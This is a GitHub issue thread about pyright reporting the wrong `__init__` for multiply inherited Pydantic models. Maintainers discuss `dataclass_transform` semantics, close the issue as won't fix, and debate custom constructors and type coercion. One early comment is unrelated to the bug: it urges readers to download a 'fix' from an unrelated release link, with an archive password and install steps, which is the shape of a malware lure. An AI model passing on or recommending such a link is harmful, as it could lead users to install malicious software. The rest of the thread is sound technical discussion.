### ISSUE TITLE
Wrong `__init__` reported when using multiple inheritance involving Pydantic `BaseModel`s

### ISSUE THREAD

**Issue by jc65536** [microsoft/pyright#8854]
**Describe the bug**
When using multiple inheritance, and the second parent is a `BaseModel`, Pyright thinks that the child's `__init__` comes from the `BaseModel`, rather than the first parent.

I am using Pydantic 2.8.2.

**Code or Screenshots**

```python
from pydantic import BaseModel

class A:
    def __init__(self, i: int):
        pass
    
    def f(self, i: int):
        pass

class B(BaseModel):
    s: str

    def f(self, s: str):
        pass

class C(A, B):
    pass

# Constructor is giving wrong diagnostic
c = C(1)    # Error: Expected 0 positional arguments
c = C(s="hi")

# Normal methods not affected
c.f(1)
c.f("hi")   # Error here as normal
```

**VS Code extension or command-line**
This is reproducible on Pylance v2024.8.2, as well as Pyright stable 1.1.373 (installed through homebrew)

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by erictraut** [comment]
Pydantic makes use of a feature of the Python type system called `dataclass_transform`. You can read about it [here](https://typing.readthedocs.io/en/latest/spec/dataclasses.html#the-dataclass-transform-decorator). This allows libraries like Pydantic, which have dataclass-like properties, to work with standards-compliant static type checkers. I was the coauthor of [PEP 681](https://peps.python.org/pep-0681/), which introduced `dataclass_transform` to Python.

You're raising an interesting point here that wasn't considered in the spec for `dataclass_transform`. The intended behavior is therefore ambiguous. It would be good to clarify this in the typing spec — in particular, how type checkers should handle the synthesis of an `__init__` method when `dataclass_transform` is applied to a metaclass, and a derived class uses multi-inheritance.

For what it's worth, pyright's current behavior matches that of mypy, which also supports `dataclass_transform`. A change in the spec would clarify this ambiguity for all type checkers.

If you are interested in pursuing a clarification in the Python typing spec, you're welcome to follow the process spelled out [here](https://github.com/python/typing-council#decisions). This change is small enough that it shouldn't require a full PEP. A simple clarification in the Python typing spec would be sufficient.

**Comment by jc65536** [comment]
Thanks for the reply, I'll look into this `dataclass_transform` stuff. Is there any interest in changing pyright's behavior to match reality, or are we prioritizing compatibility with mypy?

As an aside, it seems that *within* `C`, the correct `__init__` method is detected:
```
class C(A, B):
    def __init__(self):
        super().__init__(1)
        super().__init__("hi")  # Error here
```

**Comment by erictraut** [comment]
> Is there any interest in changing pyright's behavior to match reality

The problem is that Pydantic is just one such reality. The `dataclass_transform` is used by many libraries and code bases, so any change could/will have an effect that goes beyond Pydantic. That's why I'd want to standardize any such change and get input from the broader community before we pin down the intended behavior.

**Comment by erictraut** [comment]
@Vilcos, as a contributor to pydantic, do you have any thoughts or advice on this issue? This is related to [a similar issue](https://github.com/microsoft/pyright/issues/6489) that you filed a while back.

We may need to tighten up the spec for `@dataclass_transform` when it is used with a metaclass (like pydantic's `ModelMetaclass`). In particular, we never spec'ed the intended behavior when some class in a class hierarchy (regardless of whether multiple inheritance is involved) supplies its own `__init__` method. 

Single inheritance case:

```python
from pydantic import BaseModel

class A(BaseModel):
    x: int

class B(A):
    def __init__(self) -> None: ...

class C(B):
    y: int

C(1)
```

Multiple inheritance case:

```python
from pydantic import BaseModel

class A:
    def __init__(self) -> None: ...

class B(BaseModel):
    x: int

class C(A, B):
    pass

C(1)
```

**Comment by Viicos** [comment]
I'd say ideally we would need to be as close as possible to the stdlib dataclasses behavior. I did some experiments, and it seems that in your first example, the custom `__init__` method is only taken into account on the class it is defined (i.e. `C` takes to arguments, `x` and `y` while `B` takes no argument).

In Pydantic, we look for `cls.__init__` so even `C` takes no arguments.

However, having this custom `__init__` for dataclasses produces weird results:

```python
# Instance created fine:
b = B()
print(b)
#  [...]/lib/python3.11/dataclasses.py&quot;, line 240, in wrapper
#    result = user_function(self)
# AttributeError: 'B' object has no attribute 'x'
```

---

So if we stick with the current dataclasses behavior, pyright currently seems to synthesize the `C.__init__` method correctly (`C(x: int, y: int)`)

**Comment by erictraut** [comment]
@Viicos, it sounds like you're proposing one of two options. Could you clarify which of these you're suggestion?

Option 1. Pydantic will change its behavior to match that of dataclass behavior in this case. If you're willing to do this and don't think it would be too disruptive for pydantic users, I think that's a fine option.

Option 2. We live with the difference between pydantic's behavior and the behavior of `dataclass_transform`, which means that users of pydantic will see false positive type checking errors. This doesn't seem like a great long-term option.

Here's another thought...

Option 3. We recognize that `dataclass_transform` accommodates both decorator and metaclass mechanisms. The stdlib dataclass is decorator-based whereas pydantic is metaclass-based. These two mechanisms are distinctly different in how and when the dataclass-like behavior is added to a class in a class hierarchy. A decorator is invoked when a class is constructed and is not involved in the construction of subclasses, whereas the metaclass is in control of the construction process for a subclass. With this difference in mind, I think we could justify defining different behaviors in the `dataclass_transform` spec with regard to `__init__` synthesis. This would retain stdlib `dataclass` behaviors for libraries that use a decorator (e.g. `attrs`) and adopt pydantic's behavior for libraries that use metaclasses. My only hesitation in doing so is that this spec change would affect all metaclass-based users of `dataclass_transform`, not just pydantic. Maybe that's OK since pydantic is by far the most popular library in this category.

Regardless of which option we choose, I think it would be good to provide additional clarity in the `dataclass_transform` section of the typing spec.

**Comment by erictraut** [comment]
I started [a discussion](https://discuss.python.org/t/clarification-of-dataclass-transform-behavior-for-metaclasses/63310) in the Python typing forum to get feedback from the broader community.

**Comment by erictraut** [comment]
The public discussion unfortunately hasn't resulted in consensus. I think the most compelling argument made on that thread makes the case for sticking with pyright's (and mypy's) current behavior, which is consistent with the stdlib `dataclass`.

@Viicos, is there a possibility that pydantic maintainers would consider changing this behavior, or is that out of the question? At a minimum, it might be a good idea to document this behavior pydantic documentation so developers who use pydantic with static type checkers understand this behavioral deviation.

I'm going to close this issue as "won't fix" because I don't think there's anything actionable for pyright.

**Comment by Viicos** [comment]
> is there a possibility that pydantic maintainers would consider changing this behavior, or is that out of the question?

We could consider changing the behavior, although I'm not sure we want to introduce any changes, especially for unusual cases like this one (overriding `__init__` is uncommon when the dataclass-like class construct does it automatically).

As mentioned in the discussion thread, `msgspec` forbids defining a custom `__init__`, and there's a good reason to do so. Thanks for bringing the topic, we'll probably clarify documentation on our end

**Comment by danielgafni** [comment]
I have a use case where I'd like to do type coercion from a bunch of accepted (semantically equivalent types) into a canonical type that matches the Pydantic field type. 

Simplified example:


```py
class Door(BaseModel):
    key: list[str]

    def __init__(self, key: str | list):
        if isinstance(key, str):
            key = ket.split("/")
        super().__init__(key=key)

door_1 = door(key="a/b")
door_2 = door(key=["a", "b"])
assert door_1.key == door_2.key
```

This works very well with Pydantic. The intent here is very clear. 

However, this doesn't work well with `pyright`: it doesn't know the `__init__` can take a `str` `key`. 

So I have to add an overload: 

```py
    @overload
    def __init__(self, key: list[str] | str): ...  # pyright: ignore[reportInconsistentOverload]
```

Now `pyright` is... kinda happy! At least `Door(key="a/b")` type checks.  

But as soon as somebody wants to subclass `Door`, the type checking breaks: it doesn't recognize overloads on the parent class, and neither it does recognize the inherited `__init__`. 

This is very annoying to me as a library author. I want to provide a flexible API for my users and take a `Union` of types, and my users are supposed to subclass my models, but type checking won't work correctly for these subclassed models. 

My users would also have to define an `@overload` **and** an `__init__` since a bare `@overload` is a runtime error.

**Comment by Viicos** [comment]
> This works very well with Pydantic. The intent here is very clear.

Defining a custom `__init__()` is _not_ the intended way to do so in Pydantic. In general, I would not recommend defining a custom `__init__()`, especially if it calls `super().__init__()` internally (JSON mode validation using `model_validate_json()` will be treated as Python validation, strictness might not be preserved, [validation info](https://docs.pydantic.dev/latest/concepts/validators/#validation-info) such as context will be dropped). The canonical way to do so is by using [field validators](https://docs.pydantic.dev/latest/concepts/validators/#field-validators).

Type coercion cannot be understood by type checkers currently, we have to live with it.

**Comment by danielgafni** [comment]
Thanks! 

Interesting, thank you. Is this a limitation of Pydantic V2? That's kinda sad, Pydantic has a lot of very useful features apart from the auto-generated constructors (it really helps in other ways a well). 

I'll think about making a non-pydantic facade for my APIs, but since I won't have any Pydantic validators anymore it will effectively reduce its role to ser/de. Which also doesn't make much sense...

Is there a way to make using custom constructors safer? Without calling `super()`? So far I haven't encountered any problems, but I guess better to be safe than sorry.

**Comment by Viicos** [comment]
> Is this a limitation of Pydantic V2?

Pydantic doesn't control how type checking behaves. This is dictated by [the spec](https://typing.python.org/en/latest/spec/), with static type checkers trying to be compliant with such spec. To have support for Pydantic's type coercion, there are two possible options:

- static type checkers special case Pydantic. Pyright aims at being compliant to the spec, and doesn't do any special-casing nor does it have any plugin API to do so. [Pyrefly](https://github.com/facebook/pyrefly) is working on Pydantic support.
- Have the specification updated to support such use cases, but this is quite hard to get right.

**Comment by danielgafni** [comment]
>  > Is this a limitation of Pydantic V2?

> Pydantic doesn't control how type checking behaves. 

I was referring to user-defined constructors. Weren't they a first-class citizen in V1? Can they be fully supported in V2? I'm not really sure here, just looking for a clarification. 

As for updating the spec, that's something I would be interested in working on (given there is enough traction). 

I feel like type coercion would be a nice and logical addition to the `dataclass_transform` spec. It would be great if it could generate not only the attribute type but also the constructor argument type as well.

**Comment by Viicos** [comment]
> I was referring to user-defined constructors. Weren't they a first-class citizen in V1? Can they be fully supported in V2? I'm not really sure here, just looking for a clarification.

Ah sorry I misunderstood.

In Pydantic V1, things where different as we didn't have the concept of validation modes and having the ability to pass context using `model_validate[_json]()`. Everything was happening in Python and the `BaseModel.__init__()` method was always called even with `parse_obj()`/`parse_raw()`. I've looked at our V1 and V2 documentation, and I couldn't find any section explicitly supporting this pattern (apart from https://docs.pydantic.dev/dev/concepts/models/#model-signature, but this is orthogonal and I'll actually update this section now).

[`model_post_init()`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_post_init) can also be used instead to perform side effects after model validation.

In your case, if the only thing you need is to tell type checkers about a specific signature, you can put your custom `__init__()` method in an `if TYPE_CHECKING:` block, although as per this issue you might be limited in how it is understood by type checkers.

---

> As for updating the spec, that's something I would be interested in working on (given there is enough traction).
> 
> I feel like type coercion would be a nice and logical addition to the `dataclass_transform` spec. It would be great if it could generate not only the attribute type but also the constructor argument type as well.

It is also something that I had in mind for a while. However, it will most likely require a PEP and is not trivial to spec out.

One example could be to provide a mapping to `@dataclass_transform`, e.g.:

```python
class CoercibleToInt(Protocol):
    def __int__(self) -> int: ...

@dataclass_transform(converters={int: CoercibleToInt, ...})
class BaseModel: ...
```

For instance, what about union types and generics? With `int | str`, do you transform each member of the union to the "loose" type that would be specified in `@dataclass_transform`? What about `list[int]`? Would it be `CoercibleToList[CoercibleToInt]`?

For Pydantic specifically, there's also strict mode. Currently, the synthesized `__init__()` method by type checkers is aligned with strict mode behavior, which would no longer be the case here.

**Comment by danielgafni** [comment]
> It is also something that I had in mind for a while. However, it will most likely require a PEP and is not trivial to spec out.

Sounds like fun, I'd go for it!

> For instance, what about union types and generics? With int | str, do you transform each member of the union to the "loose" type that would be specified in @dataclass_transform? What about list[int]? Would it be CoercibleToList[CoercibleToInt]?

I think all of this is highly dependent on the specific use case. The main goal (in my case) of type coercion is providing some syntactic sugar to end users. This implies very custom rules for type coercion, nothing formal, just pure convenience **in case of obvious semantic relationship**  between types. 

Here is a reference from Dagster's [docs](https://docs.dagster.io/api/dagster/assets#asset-definitions): 

> deps (Optional[Sequence[Union[[AssetDep](https://docs.dagster.io/api/dagster/assets#dagster.AssetDep), [AssetsDefinition](https://docs.dagster.io/api/dagster/assets#dagster.AssetsDefinition), [SourceAsset](https://docs.dagster.io/api/dagster/assets#dagster.SourceAsset), [AssetKey](https://docs.dagster.io/api/dagster/assets#dagster.AssetKey), str]]]) – The assets that are upstream dependencies, but do not correspond to a parameter of the decorated function. If the AssetsDefinition for a multi_asset is provided, dependencies on all assets created by the multi_asset will be created.

As you can see, all of these are very different types. An `AssetKey` is also semantically equivalent to `list[str]`, and to `"a/slahsed/string"`, and for historical reasons even to `["even/multiple", "slashed/strings"]` (this was not banned on time). `CoercibleToAssetKey` is something like `Union[AssetKey, AssetSpec, AssetsDefinition, Sequence[str], str]`.  

I am working on a framework where similar helpers are very useful: they allow to reduce boilerplate **significantly** in most cases, while leaving room for more heavy and granular APIs when needed. 

So answering your question, I don't think it's possible to generate such type coercion logic (apart from maybe some rare cases like casting everything to `str` with `__str__`), but Pydantic already has a solution for that: validators. The hypothetical `converters` you've suggested could work as well (given they allow similar expressiveness as validators). 

You are right, the main problem here are type checkers (and `dataclass_transform`). It would be neat if this could be resolved either via `dataclass_transform` or via `Annotated` somehow (really not sure).
